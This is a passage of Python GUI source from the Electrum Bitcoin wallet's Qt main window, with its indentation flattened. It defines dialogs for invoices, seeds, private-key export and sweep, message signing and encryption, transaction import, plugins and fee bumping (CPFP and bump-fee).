d = WindowModalDialog(self, _("BIP70 Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.wallet.delete_invoices(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def pay_bip70_invoice(self, key):
pr = self.wallet.get_invoice(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.storage.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list([]))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.get_wallet_label()
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
if r:
self.show_error(_("Wallet removed: {name}").format(name=basename))
else:
self.show_error(_("Wallet file not found: {name}").format(name=basename))
self.close()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
# if redeem_script:
# vbox.addWidget(QLabel(_("Redeem Script") + ':'))
# rds_e = ShowQRTextEdit(text=redeem_script)
# rds_e.addCopyButton(self.app)
# vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"),
TRANSACTION_FILE_EXTENSION_FILTER)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(get_wif_help_text()), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
scriptpubkey = bfh(bitcoin.address_to_script(addr))
outputs = [PartialTxOutput(scriptpubkey=scriptpubkey, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, invoice=None, external_keypairs=keypairs)
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(get_wif_help_text()), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.storage.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
